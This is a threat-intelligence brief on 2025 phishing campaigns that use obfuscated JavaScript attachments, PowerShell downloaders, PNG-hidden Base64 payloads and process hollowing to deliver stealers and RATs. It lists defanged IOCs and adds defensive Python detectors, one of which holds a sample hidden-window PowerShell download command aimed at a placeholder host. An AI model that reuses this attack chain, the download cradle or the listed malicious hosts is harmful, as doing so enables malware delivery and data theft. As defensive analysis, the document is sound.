X-Labs Q3 2025 Threat Brief: Obfuscated JavaScript & Steganography Enabling Malware Delivery

Mayur Sewani
In Q3 2025, organizations across industries have seen a steep increase in JavaScript-attachment based campaigns that deliver a variety of information-stealing and RAT malware. Examples include DarkCloud, Remcos, Agent Tesla and Formbook.
Attackers are cloaking their lures in everyday business communications with fake quotes, purchase orders, shipment alerts and even WeTransfer-style links to slip past conventional filters and take advantage of recipients’ trust.
For this analysis, the X-Labs team reviewed thousands of email subject lines and found similar social engineering tactics being used repeatedly.
Subjects such as “Solicitud de cotización,” “RICHIESTA PREVENTIVO”, “RE: Payment Swift MT103,” and “DHL Shipment Notification” appear repeatedly. Many of these messages are localized to the recipient’s language and are timed to match busy delivery periods, which our processing logs show spiking in early September:
Fig. 1 - Malicious JavaScript attachment email campaigns in last 3 months
These campaigns typically use multi-stage delivery chains. The initial payloads are usually JavaScript files, obfuscated and packed inside ZIP attachments that act as downloaders. Once executed, they pull down and run credential stealers, remote-access tools and clipboard hijackers. In most cases, these toolsets have been refined to evade detection and to remain active across user sessions.
Fig. 2 - Attack chain
Analysis of These Emails:
These emails try to appear as standard business emails that target customers in their regional language, possibly generated from a template used by procurement or project management teams. They usually carry obfuscated JavaScript attachments inside archive files (RAR, 7z, Zip, TAR). Observed senders use addresses such as *@ymail[.]com, and sender IP addresses include 94[.]156[.]175[.]83 (Bulgaria) and 151[.]244[.]232[.]55 (Iran).
Fig 3.1 - Malicious email sample
Fig. 3.2 - Another malicious email sample
Analysis of an Obfuscated JavaScript Attachment:
There are various obfuscated JavaScript examples. In this case, we selected one of the most recent ones.
This script is heavily obfuscated: it stores many string fragments in an array where readable ASCII is interleaved with unusual Unicode markers (emoji or rare glyphs). It concatenates the fragments and strips out the marker characters with “.replace(//g,"")”.
The resulting plaintext string is then executed as a command to launch a process:
Fig. 4 - Obfuscated JavaScript attachment
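As an added illustration (not code from the attachment or from X-Labs), the Python helper below recovers the plaintext from a script built this way without executing it: it pulls the string-array literal, reads which glyph the script's own .replace(/…/g, "") call strips, and falls back to dropping every non-ASCII character when no such call is present. The sample script and the 🜚 marker glyph are constructed for the example.

```python
import re

# Constructed sample in the style of the loader described above. It is NOT the
# real attachment: the fragments spell out a harmless command, and the marker
# glyph (🜚) is an arbitrary stand-in for the emoji/rare glyphs seen in the wild.
SAMPLE_JS = r'''
var p = ["cm🜚d.e", "x🜚e /c ", "ec🜚ho a🜚nalys", "is-o🜚nly"];
var c = p.join("").replace(/🜚/g, "");
'''

# An array literal made only of double-quoted strings.
STRING_ARRAY = re.compile(r'\[\s*((?:"(?:[^"\\]|\\.)*"\s*,?\s*)+)\]')
# One double-quoted string (captures its body).
QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')
# The stripping call: .replace(/<marker>/g, "")
REPLACE_MARKER = re.compile(r'\.replace\(/(.+?)/g\s*,\s*""\)')


def find_string_arrays(js):
    """Every array-of-string literal in the script, as a list of fragment lists."""
    return [QUOTED.findall(m.group(1)) for m in STRING_ARRAY.finditer(js)]


def find_marker_chars(js):
    """Characters the script itself removes with .replace(/.../g, "")."""
    chars = set()
    for m in REPLACE_MARKER.finditer(js):
        # A character class such as /[🜚★]/ lists several markers at once.
        chars.update(m.group(1).strip("[]"))
    return chars


def recover_strings(js, fallback_non_ascii=True):
    """Join each fragment array and strip the markers statically (no execution).

    If the script does not reveal its marker set, fall back to dropping every
    non-ASCII character, which is what the interleaving described above amounts to.
    """
    markers = find_marker_chars(js)
    recovered = []
    for fragments in find_string_arrays(js):
        joined = "".join(fragments)
        if markers:
            joined = "".join(ch for ch in joined if ch not in markers)
        elif fallback_non_ascii:
            joined = "".join(ch for ch in joined if ch.isascii())
        recovered.append(joined)
    return recovered


if __name__ == "__main__":
    for s in recover_strings(SAMPLE_JS):
        print(s)  # cmd.exe /c echo analysis-only
```

Real samples often split the command across several arrays or nest a second layer of string building; the same two passes (collect fragments, remove what the script itself removes) apply to each layer in turn.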
First Level De-obfuscated JavaScript:
After first-level deobfuscation of the JavaScript, PowerShell commands become visible which download the next-stage payload from a compromised domain. The script builds the command text and then uses the Windows WMI interface to start that command as a hidden process (startup property .ShowWindow = 0), so whatever it constructs runs silently in the background without showing a window.
Fig. 4.1 - First level deobfuscated JavaScript
Fig. 4.2 - PowerShell code
PowerShell tries to connect and download the next-stage steganography payload (a .png file) from hxxps://educa[.]rr[.]gov[.]br/resources/img/1[.]png and a .TXT file from hxxp://motorshipco[.]rf[.]gd/arquivo_20250917185017[.]txt.
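As an added detection example (not part of the X-Labs write-up), here is a small Python triage routine over process-creation records shaped like Sysmon Event ID 1 (the field names are assumed for the example and the records are constructed, not real telemetry). It scores the two observable traces of the chain above: a script host (wscript.exe or cscript.exe) launching a .js file from a user-writable path, and PowerShell started with WmiPrvSE.exe as its parent, a hidden window and a download primitive on its command line. The .ShowWindow = 0 startup property is not visible in process telemetry; what is visible is that a process created through WMI is parented by WmiPrvSE.exe rather than by the script that requested it.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1-like field names, assumed
# for this example). The URL is a placeholder, not an indicator from the campaign.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Downloads\Quote_4471.js"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"powershell -w hidden -nop -c (New-Object Net.WebClient).DownloadString('http://example.invalid/1.png')"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -File C:\Scripts\inventory.ps1"},
]

HIDDEN = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
SCRIPT_HOST = re.compile(r"\\[wc]script\.exe$", re.I)
SCRIPT_FROM_USER_PATH = re.compile(r'\\(?:Downloads|Temp|AppData)\\[^"]*\.(?:js|jse|wsf)\b', re.I)

# Weight per indicator: one strong indicator or two weaker ones reach the threshold.
WEIGHTS = {
    "script host running .js/.jse/.wsf from a user-writable path": 3,
    "powershell parented by WmiPrvSE.exe (WMI process creation)": 2,
    "download primitive in command line": 2,
    "hidden window requested": 1,
}


def score_event(ev):
    """Return (score, reasons) for one process-creation record."""
    reasons = []
    img, parent, cmd = ev["Image"], ev["ParentImage"], ev["CommandLine"]
    if SCRIPT_HOST.search(img) and SCRIPT_FROM_USER_PATH.search(cmd):
        reasons.append("script host running .js/.jse/.wsf from a user-writable path")
    if img.lower().endswith("\\powershell.exe"):
        if parent.lower().endswith("\\wmiprvse.exe"):
            reasons.append("powershell parented by WmiPrvSE.exe (WMI process creation)")
        if DOWNLOAD.search(cmd):
            reasons.append("download primitive in command line")
        if HIDDEN.search(cmd):
            reasons.append("hidden window requested")
    return sum(WEIGHTS[r] for r in reasons), reasons


def triage(events, threshold=3):
    """Keep only records whose combined indicator weight reaches the threshold."""
    findings = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            findings.append({"Image": ev["Image"], "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["score"], f["Image"], "|", "; ".join(f["reasons"]))
```

The weights are deliberately conservative: a lone hidden-window flag is common in legitimate scheduled tasks, whereas a script host opening a .js from Downloads is rarely benign in a business environment, so it clears the threshold on its own.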
Steganography:
The Downloaded PNG file contains a payload encoded in Base64 format, representing either a DLL or EXE binary.
Fig. 5.1 - PNG file hosted on compromised domain
This encoded data is embedded within the image stream, specifically delimited by the markers "BaseStart-" and "-BaseEnd". The presence of these markers facilitates extraction and decoding of the embedded executable content for further execution or analysis.
Fig. 5.2 - Base64-encoded stream inside PNG
Decoding the Base64 stream reveals the PE magic header:
Fig. 5.3 - PE stream after Base64 decode
PowerShell also checks for alternative payload delivery mechanisms, sometimes leveraging text files containing embedded Base64-encoded streams representing executable binaries (EXE) or dynamic-link libraries (DLL).
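For analysts who need to confirm what a carrier file is really holding, here is an added Python example (not X-Labs tooling) that handles both delivery forms described above: a Base64 stream delimited by "BaseStart-" and "-BaseEnd" inside an image, and a text file that is Base64 end to end. It decodes the stream and checks for a PE shape (an "MZ" header whose e_lfanew field points at a "PE\0\0" signature) rather than trusting the file extension. The PNG carrier and the PE-shaped blob are constructed for the example and are not the campaign's files.

```python
import base64
import binascii
import re
import struct

START, END = b"BaseStart-", b"-BaseEnd"
PNG_SIG = b"\x89PNG\r\n\x1a\n"


def build_fake_pe(size=0x80):
    """Constructed stand-in for a PE image: 'MZ' at offset 0 and e_lfanew (at 0x3C)
    pointing to a 'PE\\0\\0' signature. Not executable; only the shape a checker sees."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\x00\x00"
    return bytes(buf)


def build_fake_png_carrier(payload):
    """Constructed carrier: PNG signature, filler, then the marker-delimited Base64 blob."""
    return PNG_SIG + b"\x00" * 32 + START + base64.b64encode(payload) + END + b"\x00" * 8


def build_fake_txt_carrier(payload, width=76):
    """Constructed carrier for the .TXT variant: Base64 wrapped into lines."""
    b64 = base64.b64encode(payload)
    return b"\r\n".join(b64[i:i + width] for i in range(0, len(b64), width)) + b"\r\n"


def looks_like_pe(blob):
    """True if blob has an MZ header whose e_lfanew points at a PE\\0\\0 signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def extract_payload(data):
    """Pull the Base64 stream out of either carrier form and decode it, or return None."""
    m = re.search(re.escape(START) + rb"(.*?)" + re.escape(END), data, re.S)
    if m:
        b64 = m.group(1)
    elif re.fullmatch(rb"[A-Za-z0-9+/=\r\n\s]+", data):
        b64 = data  # whole file is Base64 (the .TXT delivery variant)
    else:
        return None
    try:
        return base64.b64decode(b64)  # non-alphabet bytes such as CRLF are discarded
    except binascii.Error:
        return None


def analyze(data):
    """Summarize what the carrier claims to be versus what it carries."""
    payload = extract_payload(data)
    return {
        "carrier": "png" if data.startswith(PNG_SIG) else "text",
        "has_markers": START in data and END in data,
        "embedded_pe": payload is not None and looks_like_pe(payload),
        "payload_size": len(payload) if payload else 0,
    }


if __name__ == "__main__":
    pe = build_fake_pe()
    print(analyze(build_fake_png_carrier(pe)))
    print(analyze(build_fake_txt_carrier(pe)))
```

The same check is cheap enough to run inline on a proxy or sandbox: an image response whose body decodes to an MZ/PE structure is a strong indicator on its own, independent of which domain served it.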
Final Payload Analysis
We observed mostly .NET payloads being delivered via this attack chain. Analysis shows the DLL payload is compiled and protected with .NET Reactor (6.X) [Control Flow + Anti-ILDASM].
Fig. 6 - Compiler and other details of DLL file
The DLL carries Microsoft Task Scheduler version information:
Fig. 6.1 - Version information
Fig. 6.2 - .NET Assembly information
Based on the .NET assembly information (Fig. 6.2), the DLL appears to be designed to evade analysis and .NET verification checks. Its methods and classes use randomized names and are further obscured with Unicode escape sequences.
Fig. 6.3 - VM-Detector method
Here we observed the use of virtual machine and sandbox evasion techniques. The code can invoke Process.GetProcesses() to collect all active processes on the system.
It then uses cached delegate functions to project each Process into a string (probably ProcessName) and applies another delegate to normalize and sort them.
The ordered list is stored in an obfuscated member of a VirtualMachineDetector object. Combined with the surrounding control-flow checks, this routine is part of a VM/sandbox detection mechanism.
Fig. 6.4 - Process hollowing APIs
Namespace: HackForums.gigajew
The name suggests possible origins from underground forums known for sharing malware or hacking tools.
Looking into this code, we can see a sequence of API calls indicating that process hollowing takes place, targeting the RegASM.exe process.
API calls:
- CreateProcess — makes a new program start running on the computer. Sometimes that new program is started but kept paused so someone can change things before it actually runs.
- VirtualAllocEx — reserves a chunk of memory inside another program so something can be placed there later. Think of it as saving space inside someone else’s workspace.
- WriteProcessMemory — copies data into that reserved space inside the other program. It’s like putting a file on someone else’s desk.
- ZwUnmapViewOfSection — removes or clears a block of memory that’s already mapped in a program, making room to put something different there.
- GetThreadContext / SetThreadContext — read or change what a paused program’s processor registers are doing (where it will continue executing). It’s like checking or changing the bookmark so the program will jump to a new page when it resumes.
- ResumeThread — lets a paused program or thread continue running again.
- CloseHandle — closes a reference to a resource (like closing a file or connection) as clean-up.
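Sandbox or API-monitor traces make this sequence easy to spot. As an added example (not X-Labs tooling), the Python below parses constructed trace lines of the form `<pid><TAB><Api>(<args>)` and flags a process that creates a child with CREATE_SUSPENDED (0x4) and then, in order, writes into it, sets its thread context and resumes it; the unmap and allocation calls are recorded as supporting evidence, since the core of the technique is the suspended-create, write, set-context, resume chain. The trace format, handles and the RegAsm.exe path are constructed for the example.

```python
import re

# Constructed API-trace lines (not output of any real monitor): "<pid>\t<api>(<args>)".
# pid 1001 shows the hollowing chain against RegAsm.exe; pid 2002 is a benign launch.
SAMPLE_TRACE = (
    '1001\tCreateProcessW(lpApplicationName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", dwCreationFlags=0x4)\n'
    "1001\tGetThreadContext(hThread=0x1a8)\n"
    "1001\tZwUnmapViewOfSection(hProcess=0x1b0, BaseAddress=0x400000)\n"
    "1001\tVirtualAllocEx(hProcess=0x1b0, lpAddress=0x400000, dwSize=0x2a000, flProtect=0x40)\n"
    "1001\tWriteProcessMemory(hProcess=0x1b0, lpBaseAddress=0x400000, nSize=0x200)\n"
    "1001\tWriteProcessMemory(hProcess=0x1b0, lpBaseAddress=0x401000, nSize=0x1c000)\n"
    "1001\tSetThreadContext(hThread=0x1a8)\n"
    "1001\tResumeThread(hThread=0x1a8)\n"
    "1001\tCloseHandle(hObject=0x1b0)\n"
    '2002\tCreateProcessW(lpApplicationName="C:\\Windows\\System32\\notepad.exe", dwCreationFlags=0x0)\n'
    "2002\tCloseHandle(hObject=0x2c0)\n"
)

LINE = re.compile(r"^(\d+)\t(\w+)\((.*)\)$")
FLAGS = re.compile(r"dwCreationFlags=(0x[0-9a-fA-F]+)")
APPNAME = re.compile(r'lpApplicationName="([^"]*)"')
CREATE_SUSPENDED = 0x4

# The chain that must appear in this order (as a subsequence) for one pid.
REQUIRED = ["CreateProcess(suspended)", "WriteProcessMemory", "SetThreadContext", "ResumeThread"]
# Calls that strengthen the finding but are not required.
SUPPORTING = {"ZwUnmapViewOfSection", "NtUnmapViewOfSection", "VirtualAllocEx", "GetThreadContext"}


def normalize(api, args):
    """Collapse A/W variants and fold the suspended flag into the event name."""
    base = re.sub(r"[AW]$", "", api)  # CreateProcessW -> CreateProcess
    if base == "CreateProcess":
        m = FLAGS.search(args)
        flags = int(m.group(1), 16) if m else 0
        return "CreateProcess(suspended)" if flags & CREATE_SUSPENDED else "CreateProcess"
    return base


def detect_hollowing(trace):
    """Return one finding per pid whose call order matches the hollowing chain."""
    per_pid = {}
    for line in trace.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        pid, api, args = m.groups()
        state = per_pid.setdefault(pid, {"events": [], "target": None})
        ev = normalize(api, args)
        if ev == "CreateProcess(suspended)":
            a = APPNAME.search(args)
            state["target"] = a.group(1) if a else None
        state["events"].append(ev)

    findings = []
    for pid, state in per_pid.items():
        idx = 0
        for ev in state["events"]:  # ordered subsequence match
            if idx < len(REQUIRED) and ev == REQUIRED[idx]:
                idx += 1
        if idx == len(REQUIRED):
            findings.append({
                "pid": pid,
                "target": state["target"],
                "supporting": sorted(set(state["events"]) & SUPPORTING),
            })
    return findings


if __name__ == "__main__":
    for f in detect_hollowing(SAMPLE_TRACE):
        print(f"pid {f['pid']} hollowed {f['target']} (supporting: {', '.join(f['supporting'])})")
```

Matching on order rather than on the mere presence of each API keeps the false-positive rate down: debuggers and installers legitimately call WriteProcessMemory or SetThreadContext, but rarely in this exact chain against a freshly created suspended child.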
Fig. 6.5 - Email action for exfiltration
An EmailAction object like this appears to be used to prepare and send email, possibly for data exfiltration or callbacks to an attacker mailbox/C2; obfuscation hides the exact SMTP/FTP calls.
All of this activity happens after process hollowing of the targeted legitimate process RegASM.exe, which executes the final stealer and RAT; these in turn try to exfiltrate critical data to dynamic DNS servers or via SMTP/FTP.
Conclusion:
Q3 2025 shows a rising trend of email campaigns leveraging obfuscated JavaScript attachments. Attackers disguise JavaScript files in routine business emails like invoices, quotes and shipment alerts to evade detection.
These scripts act as downloaders, using PowerShell and steganography to deliver .NET-based RATs and Infostealers. Advanced obfuscation, sandbox evasion, and process hollowing highlight the increasing sophistication of these attacks. Organizations should combine advanced email filtering, endpoint protection, and user awareness to mitigate these threats.
Protection Statement:
Forcepoint customers are protected at the following stages:
- Stage 2 (Lure) - Malicious JavaScript attachments associated with these attacks are identified and blocked by email security analytics.
- Stage 5 (Dropper File) - The dropper executable files are added to the Forcepoint malicious database and are blocked.
- Stage 6 (Call Home) - C2 domains are categorized under the security category and blocked.
IOCs of Multiple Infostealers and RAT:
Initial Stage URLs:
- hxxps://educa[.]rr[.]gov[.]br/resources/img/1[.]png
- hxxps://archive[.]org/download/optimized_msi_20250814/optimized_MSI[.]png
- hxxp://motorshipco[.]rf[.]gd/arquivo_20250917185017[.]txt
- hxxps://mohamedayesh[.]com/z[.]txt
- hxxps://files[.]catbox[.]moe/91noox[.]zip
- hxxps://files[.]catbox[.]moe/i5wcp9[.]zip
- hxxp://198[.]55[.]98[.]29/FF/VXVXH6[.]zip
- hxxp://198[.]55[.]98[.]29/FF/stein[.]txt
- hxxps://drive[.]google[.]com/uc?export=download&id=1aSe3ubep62B4re5J5C9DfN4waT-gYIR5
- hxxps://drive[.]google[.]com/uc?export=download&id=1y-UcTJccDfFz5O1fUqg1gP8mdwUKVbla
C2s:
- ftp[.]haliza[.]com[.]my
- tooblessed2bcursed[.]duckdns[.]org
- 196[.]251[.]92[.]42
Compromised email accounts:
- service[.]bluete@lindenapotheke-mhl[.]de
- service@rainer-will-hs[.]de
- origin@haliza[.]com[.]my
Mayur serves as a Senior Security Researcher as part of the Forcepoint X-Labs Research Team. He focuses on APT malware, information stealers and phishing attacks, and works to stay on top of the latest threats. He is passionate about advancing the field of defensive adversary emulation and research.